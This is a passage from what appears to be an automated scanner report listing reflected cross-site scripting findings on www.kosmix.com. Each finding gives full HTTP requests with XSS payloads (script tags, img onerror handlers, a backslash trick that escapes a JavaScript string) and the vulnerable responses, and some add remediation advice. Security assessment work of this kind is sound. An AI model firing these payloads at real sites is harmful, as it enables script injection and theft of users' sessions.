GET /javascripts/84c71"><img%20src%3da%20onerror%3dalert(1)>15a60d74c0c/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:03 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:01 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:03 GMT;path=/
Content-Length: 16718

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="84c71"><img Src=a Onerror=alert(1)>15a60d74c0c - topic_bottom kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.24. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1046b"><script>alert(1)</script>84938fe74ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1046b"><script>alert(1)</script>84938fe74ad/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302898890 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; last_referrer=http%3A//burp/show/6; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:13:10 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=1046b%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:13:10 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:15:10 GMT;path=/
Content-Length: 16425

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/1046b"><script>alert(1)</script>84938fe74ad/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js"/>
...[SNIP]...

4.25. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a3c8"><img%20src%3da%20onerror%3dalert(1)>78dcdd22fe7 was submitted in the REST URL parameter 2. This input was echoed as 2a3c8"><img src=a onerror=alert(1)>78dcdd22fe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/2a3c8"><img%20src%3da%20onerror%3dalert(1)>78dcdd22fe7/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:16 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:16 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:16 GMT;path=/
Content-Length: 16763

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="2a3c8"><img Src=a Onerror=alert(1)>78dcdd22fe7 - topic_bottom_homepage kosmix sem chimborazo 152138.js" />
...[SNIP]...

4.26. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c19c5\"%3be5be2673620 was submitted in the REST URL parameter 2. This input was echoed as c19c5\\";e5be2673620 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/c19c5\"%3be5be2673620/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:20 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:20 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:20 GMT;path=/
Content-Length: 16546

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1331733948";
   kl.query = "C19c5\\";e5be2673620";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.27. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bef0"><script>alert(1)</script>733c8f68458 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascripts9bef0"><script>alert(1)</script>733c8f68458/cache/topic_top-s_kosmix-chimborazo-152138.js?1302898890 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:40 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts9bef0%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:40 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:40 GMT;path=/
Content-Length: 16421

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/javascripts9bef0"><script>alert(1)</script>733c8f68458/cache/topic_top-s_kosmix-chimborazo-152138.js"/>
...[SNIP]...

4.28. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88e21\"%3b53e7bff7df4 was submitted in the REST URL parameter 2. This input was echoed as 88e21\\";53e7bff7df4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /javascripts/88e21\"%3b53e7bff7df4/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:49 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:49 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:49 GMT;path=/
Content-Length: 16476

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "1178061705";
   kl.query = "88e21\\";53e7bff7df4";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.29. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76346"><img%20src%3da%20onerror%3dalert(1)>137f8037081 was submitted in the REST URL parameter 2. This input was echoed as 76346"><img src=a onerror=alert(1)>137f8037081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /javascripts/76346"><img%20src%3da%20onerror%3dalert(1)>137f8037081/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:44 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:44 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:44 GMT;path=/
Content-Length: 16693

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="76346"><img Src=a Onerror=alert(1)>137f8037081 - topic_top s_kosmix chimborazo 152138.js" />
...[SNIP]...

4.30. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12978"><script>alert(1)</script>c053c831743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets12978"><script>alert(1)</script>c053c831743/cache/topic-s_kosmix-chimborazo-152138.css?1305486595 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:06 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets12978%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:05 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:06 GMT;path=/
Content-Length: 16415

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/stylesheets12978"><script>alert(1)</script>c053c831743/cache/topic-s_kosmix-chimborazo-152138.css"/>
...[SNIP]...

4.31. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e702"><img%20src%3da%20onerror%3dalert(1)>8f650b987d1 was submitted in the REST URL parameter 2. This input was echoed as 4e702"><img src=a onerror=alert(1)>8f650b987d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/4e702"><img%20src%3da%20onerror%3dalert(1)>8f650b987d1/topic-s_kosmix-chimborazo-152138.css?1305488471 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:58 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:58 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:58 GMT;path=/
Content-Length: 16678

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<meta name="title" content="4e702"><img Src=a Onerror=alert(1)>8f650b987d1 - topic s_kosmix chimborazo 152138.css" />
...[SNIP]...

4.32. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60518\"%3b762b8c58dd7 was submitted in the REST URL parameter 2. This input was echoed as 60518\\";762b8c58dd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /stylesheets/60518\"%3b762b8c58dd7/topic-s_kosmix-chimborazo-152138.css?1305488471 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:06:01 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:06:01 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:08:01 GMT;path=/
Content-Length: 16460

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<script type="text/javascript">
   var kl = kapp.log;
   window.document.kl = kl;
   kl.session_name = "kid";
   kl.session_id = "f062f6f0-615b-012e-931e-003048fe4cb2";
   kl.svid = "367250210";
   kl.query = "60518\\";762b8c58dd7";
   kl.source = kapp.traffic.source();
   kl.subsource = kapp.traffic.subSource();
   kl.coordinate_anchor_id = "header";
   kl.http_referrer = "http://www.kosmix.com/";
   kl.build_id = '152138';
   kl.release_
...[SNIP]...

4.33. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4edc7"><script>alert(1)</script>2f8f59fa7df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /stylesheets4edc7"><script>alert(1)</script>2f8f59fa7df/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450625 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1290282890-1305489649089; last_referrer=http%3A//burp/show/6; __utmz=33745467.1305489787.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=33745467.1661155596.1305489647.1305489647.1305489787.2; __utmc=33745467; __utmb=33745467.1.10.1305489787; kid=320636d0-615c-012e-b1f7-003048fe3090; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:51 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets4edc7%22%3E%3Cscript%3Ealert%281%29%3C; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:51 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b345525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:14:51 GMT;path=/
Content-Length: 16440

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...
<link rel="canonical" href="http://www.kosmix.com/stylesheets4edc7"><script>alert(1)</script>2f8f59fa7df/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css"/>
...[SNIP]...

4.34. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf0bb"><img%20src%3da%20onerror%3dalert(1)>a86826fda4 was submitted in the REST URL parameter 2. This input was echoed as cf0bb"><img src=a onerror=alert(1)>a86826fda4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /stylesheets/cf0bb"><img%20src%3da%20onerror%3dalert(1)>a86826fda4/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
